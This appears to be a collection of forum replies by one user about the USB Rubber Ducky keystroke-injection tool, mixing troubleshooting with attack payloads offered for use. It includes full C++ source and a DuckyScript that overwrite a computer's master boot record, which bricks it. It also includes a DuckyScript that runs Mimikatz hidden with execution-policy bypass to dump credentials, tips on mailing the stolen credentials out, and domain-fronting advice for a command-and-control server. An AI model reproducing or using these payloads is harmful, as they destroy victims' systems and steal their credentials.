ThoughtfulDev

How about using Domain Fronting? You can connect your C&C Server to a VPN with port forwarding and then let the shell connec to that port on the vpn side which will then be forwarded to your C&C... in theory.

be quiet! Silent Base 800 Black, No Window ASUS Prime X370-Pro AMD Ryzen 7 1700X 2x8GB Vengeance DDR4-3200 be quiet! Silent Loop 120mm MSI GTX 770 Samsung 850 Evo 250GB SSD 550 Watt Corsair Semi Modular PSU (dont know the actual name rn) Wanted to buy a new GPU for Machine Learning but prices are so damn high...

Did you changed the Keyboard layout to "es" when compiling the duckyscript?

Reminds me of my PyDuckGen. But seems like your script works ;) (I have a look if i can improve your script)

I guess that this is not possible since no driver is loaded and/or can be installed if you arent on win/linux/osx

I dont have the original one just my modified version from PyDuckGen: Click

this is wrong no quotes and = are needed to it should look like this: STRING K0cj0mKMchAAAAAAAAAAC0MHOM6B-qtOB9zszza03NGx21eRsaKiurS

that would be possible if he were using a BashBunny haha :) since the ducky is only a HID this wont work directly on the ducky.

As far as i know the ducky cant do that on it self. maybe you can write a bash/batch script to copy a random key/number into your clipboard and start that and the ducky just presses CTRL+V to copy that random character?

The intel ones do work with e.g Gallium OS(which is ubuntu + the necessary chromebook drivers). (use it myself)

I dont get your problem? Session 1 was opened...so just use sessions to list your sessions and interact with them. This is basic metasploit stuff... maybe you should have a look at metasploit minute.

Credits: https://github.com/brainsmoke/nyanmbr (he wrote a freaking bootloader with nyancat.. AMAZING) I made a payload to overwrite your bootloader with the nyancat bootloader which will render your PC USELESS. CAUTION: This will brick your bootloader. DO NOT TRY THIS on your OWN PC USE A VM 1. Download the precompiled boot.exe (source code is here if you want to compile yourself): #include <windows.h> #include <conio.h> #include <iostream> int main(int argc, char* argv[]){ DWORD dw; char *pathToBin = "boot.bin"; HANDLE drive = CreateFile("\\\\.\\PhysicalDrive0", GENERIC_ALL, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0); if (drive != INVALID_HANDLE_VALUE){ HANDLE binary = CreateFile(pathToBin, GENERIC_READ, 0, 0, OPEN_EXISTING, 0, 0); if (binary != INVALID_HANDLE_VALUE){ DWORD size = GetFileSize(binary, 0); if (size > 0){ byte *mbr = new byte[size]; if (ReadFile(binary, mbr, size, &dw, 0)){ std::cout << "Binary file successfuly read!" << std::endl; if (WriteFile(drive, mbr, size, &dw, 0)){ std::cout << "First sector overritten successfuly!" << std::endl; } else std::cerr << "Fatal error! Can't override 1st sector!" << std::endl; } else std::cerr << "Error reading from binary file!" << std::endl; } else std::cerr << "Invalid binary file!" << std::endl; } else{ std::cerr << "Can't find the binary file to read from!" << std::endl; } CloseHandle(binary); } else std::cerr << "Administrator privileges required!" << std::endl; CloseHandle(drive); return 0; } 2. Create Folder exec on your ducky sdcard and copy boot.exe into it. 3. Download the img file from https://github.com/brainsmoke/nyanmbr and rename it to boot.bin and put it in DUCKY\exec\boot.bin 4. Here is the duckyscript( make sure your sdcard is labeld: DUCKY): REM I am NOT responsible for ANY DAMAGE REM overwrites bootloader with https://github.com/brainsmoke/nyanmbr DELAY 5000 ESCAPE DELAY 500 CONTROL ESCAPE DELAY 500 STRING cmd DELAY 500 CTRL-SHIFT ENTER DELAY 1000 REM replace with desired uac alt + key kombo (y for yes in english , j for german etc) ALT y DELAY 1500 STRING for /f %a in ('wmic logicaldisk get volumename^,name ^| find "DUCKY"') do %a ENTER DELAY 300 STRING cd exec ENTER DELAY 300 STRING boot.exe ENTER DELAY 1000 STRING exit ENTER I have also added this payload to my PyDuckGen (https://github.com/ThoughtfulDev/PyDuckGen) which makes generating payloads easier boot.exe

Nope no solution except what you already said: Delay

try encoding in your keyboard layout (default is US)

You can run powershell and cmd without admin privs or am i mistaken? e.g ctrl +r and then powershell/cmd.exe will run the it without admin privs.

I'm using PIA but have a look at That One Privacy Site. That dude is just awesome!

Are you sure that php is enabled in your apache or IIS webserver? try to place a php file e.g test.php in the webdirectory root with the following content: <?php phpinfo(); ?> if you now visit yourwebserver/test.php you should see a table with some information if php is enabled. I use this to run mimikatz from sdcard/exec/mimikatz.ps1 and save the content to sdcard/data/mimikatz REM ------------------------------------------------------------------------------------- REM Get drive letter of drive with label DUCKY REM ------------------------------------------------------------------------------------- STRING for /f %d in ('wmic volume get driveletter^, label^|findstr "DUCKY"') do @set duck=%d ENTER DELAY 500 REM ------------------------------------------------------------------------------------- REM Copy and execute Invoke Mimikatz REM ------------------------------------------------------------------------------------- STRING if exist %duck%\exec\mimikatz.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module %duck%\exec\mimikatz.ps1;Invoke-Mimikatz -DumpCreds|Out-File '%duck%\data\mimikatz\%computername%_creds.txt';" Make sure that sdcard/exec/mimikatz.ps1 and the folder sdcard/data/mimikatz exist.

The c_duck_v2.1.hex is the standart TwinDuck Firmware which mounts your Ducky as a HID Keyboard and USB Storage Device. The payload starts as soon as you plug it in. This is probably want you want to use.

Flash the TwinDuck Firmware, which allows the ducky to be seen as a USB Storage Device and a HID Keyboard. The call your SDCard 'DUCKY' and use this script: for /f %d in ('wmic volume get driveletter^, label^|findstr "DUCKY"') do @set duck=%d %duck& stores the drive letter of your ducky :)

Use something like: Invoke-Mimikatz -DumpCreds|Out-File '%tmp%\%computername%_creds.txt'; this writes the output of Invoke-Mimikatz to your temp folder in a file name yourpcname_creds.txt which you can then read and or even send as a email attachment if you want. ps: the invoke mimikatz script isn't hosted on darrens webserver - use your own host.

As far as i know it should show any output since it only writes a file in the current folder (e.g /var/www/html or sth).

It should work as long as there are corresponding hotkeys to do the things you want :)

FAT32. and no only the inject.bin since this was just the hello world payload. as already said use the java encoder to encode your raw txt payload into the inject.bin

I use this one to find a drive labeled ducky(works in win 10/8/7) for /f %d in ('wmic volume get driveletter^, label^|findstr "DUCKY"') do @set duck=%d %duck% contains your ducky drive letter.

Sounds like you need a Basic Metasploit payload (dont worry about the stealth /undetected part for now). Have a look at Metasploit Minute for Tutorials about Metasploit.